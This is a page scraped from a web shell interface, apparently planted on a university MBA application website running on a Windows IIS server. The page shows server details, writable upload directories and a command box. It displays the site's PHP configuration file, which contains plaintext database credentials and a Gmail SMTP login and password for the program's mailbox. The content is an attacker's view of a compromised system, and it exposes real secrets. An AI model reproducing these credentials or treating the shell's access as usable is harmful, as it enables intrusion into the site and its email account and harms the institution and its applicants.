403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.216.231
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/business/applynow_DONE/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/business/applynow_DONE/configuration.php
<?php
defined('APP_NAME') || define('APP_NAME', 'ApplyNow');
defined('APP_VERSION') || define('APP_VERSION', 'v1');

define('APP_PATH',	realpath(dirname(__FILE__)));

$locale = isset($_GET['lang']) ? $_GET['lang'] : 'el'; // default language
$locale='el';
/*
 * Config
*/
defined('DEV') || define('DEV', true); 								// development / production
defined('LEVEL') || define('LEVEL', 0); 							// default level / used for getURL paths
defined('GA') || define('GA', true); 								// google analytics

defined('SKIN_JS') || define('SKIN_JS', false); 						// allow skin customization from the browser
defined('SKIN_CUSTOM') || define('SKIN_CUSTOM', false); 			// filename without extension (eg. "brown") or false for default
defined('SKIN') || define('SKIN', SKIN_JS ? false : SKIN_CUSTOM); 	// edit SKIN_CUSTOM above


$_LEVEL = LEVEL; // used for getURL paths


$root_url="http://business.teicm.gr/applynow";
$db_host="localhost";
$db_user="business_pms";
$db_password="b1u2s5i3n4ess";
$db_database="businesspmsapp";
$db_prefix="";

define("SUB_DATE", "2017-09-08");

/**deprecated**/
define("SMTP_SECURE", "ssl");
define("EMAIL_ADDRESS", "business.teiser@gmail.com");
define("EMAIL_NAME", "ΠΜΣ στη Διοίκηση Επιχειρήσεων (ΜΒΑ) - Διεθνές Πανεπιστήμιο Ελλάδος (Σέρρες)");
define("EMAIL_HOST", "smtp.gmail.com");
define("EMAIL_PORT", "465");
define("EMAIL_USERNAME", "business.teiser@gmail.com");
define("EMAIL_PASSWORD", "business280");

define("CURRENT_SITE",$root_url);

//error_reporting(0);

?>

Youez - 2016 - github.com/yon3zu
LinuXploit